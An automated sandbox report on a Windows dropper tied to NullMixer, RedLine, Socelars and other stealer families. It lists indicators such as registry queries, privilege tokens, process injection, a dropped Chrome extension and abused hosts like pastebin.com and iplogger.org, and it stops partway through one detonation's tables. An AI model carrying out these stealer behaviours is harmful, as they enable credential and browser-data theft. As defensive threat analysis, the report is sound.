Malware Analysis Report

2025-01-02 05:59

Sample ID 241123-xabvfazpgv
Target e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe
SHA256 e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef

Threat Level: Known bad

The file e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe was found to be: Known bad.

Malicious Activity Summary

fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer

RedLine

OnlyLogger

Fabookie

RedLine payload

Gcleaner family

Nullmixer family

PrivateLoader

Fabookie family

GCleaner

NullMixer

Onlylogger family

Socelars family

Socelars payload

Redline family

Socelars

Detect Fabookie payload

Privateloader family

OnlyLogger payload

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

ASPack v2.12-2.42

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Drops Chrome extension

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Blocklisted process makes network request

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Unsigned PE

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Modifies registry class

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Checks SCSI registry key(s)

Kills process with taskkill

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-23 18:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-23 18:38

Reported

2024-11-23 18:40

Platform

win10v2004-20241007-en

Max time kernel

68s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5088 set thread context of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-4OPRC.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768607472648869" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4224 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe
PID 4224 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe
PID 4224 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe
PID 3140 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1564 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1564 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 4964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 4964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 4964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3140 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3140 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe C:\Windows\SysWOW64\cmd.exe
